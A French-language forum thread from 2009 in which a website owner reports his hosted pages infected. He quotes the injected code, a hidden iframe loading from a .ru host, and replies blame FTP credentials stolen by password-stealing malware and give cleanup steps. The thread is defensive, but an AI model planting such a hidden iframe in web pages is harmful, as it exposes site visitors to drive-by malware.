fichiers du ftp infecté

fichiers du ftp infecté - Sécurité - Windows & Software

Marsh Posté le 21-09-2009 à 10:20:17    

Salut,

 

j'ai un site hébergé chez OVH sur un serveur mutualisé...

 

je constate que mon site déconne à l'affichage, crée des erreurs. en regardant le code source je m'en rend compte qu'il y a du code je sais pas d'où ça vient et c'est ça qui fout la merde.

 

Un Exemple : N'allez pas sur le lien

 
Citation :

<body><div style="display:none"><iframe src="http://medical-static-center.ru:8080/index.php" width=651 height=860 ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div><div style="display:none

 

Il m'efface tout ce qu'il y a dans body et remplace par son code et ne ferme pas la balise...

 

Mon ftp a été craqué ????

 

Aidez moi svp :(


Message édité par Ryoh le 21-09-2009 à 10:21:30
Reply

Marsh Posté le 21-09-2009 à 10:20:17   

Reply

Marsh Posté le 21-09-2009 à 10:34:34    

Deux possibilités : Faille de ton site s'il est dynamique (comporte des parties en langage serveur genre PFP), ou faille de ton ftp.
 
Dans le doute, patche des deux côtés (vérifie s'il n'existe pas des failles connues et des patchs associés pour la partie dynamique de ton site, change tes identifiants et mots de passe FTP associés).

Reply

Marsh Posté le 21-09-2009 à 11:43:01    

Je vois pas de quoi tu parle pour le PFP. Je fais un peu de php sur quelques pages.
Le blog sur wordpress déconne à cause d'une parse error alors que ça marchait bien...
y'a des répertoires avec des pages en html qui ont le code à la con avec l'iframe...

 

j'ai changé le mot de passe ftp, on va voir ce que ça donne...

 

ptain mais c'est galère, j'ai beaucoup de trucs qui sont infectés et qui déconnent et qui sont en ligne, le gars qui a fait ça est une belle enflure !!! :fou:  :fou:  :fou:


Message édité par Ryoh le 21-09-2009 à 11:43:18
Reply

Marsh Posté le 21-09-2009 à 11:49:18    

je voulais dire PHP.

Reply

Marsh Posté le 22-09-2009 à 04:37:15    

Choses à faire:
- Mets tout ça hors ligne.
- Remets en place la dernière version de PHP, serveur Web (Apache, nginx, lighttpd au choix)
- BDD aussi le cas échéant
- Remets un serveur FTP à jour.
- Change les mots de passe, renomme l'admin distant.
- Remonte une sauvegarde récente.

 

EDIT: Argh, mutualisé...


Message édité par le pote le 22-09-2009 à 04:41:10
Reply

Marsh Posté le 26-10-2009 à 10:29:44    

Salut,
 
Juste pour dire qu'il y a de grande chance que ce soit un mot de passe FTP volé et notamment par le malware PWS:Win32.Daurso.A voir http://www.malekal.com/PWS_Win32.D [...] 32.exe.php
 
Tu as un exemple là : http://forum.malekal.com/pws-win32 [...] tp#p171073
 
Plus d'infos :
http://blog.unmaskparasites.com/20 [...] e-network/
http://blog.unmaskparasites.com/20 [...] passwords/

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed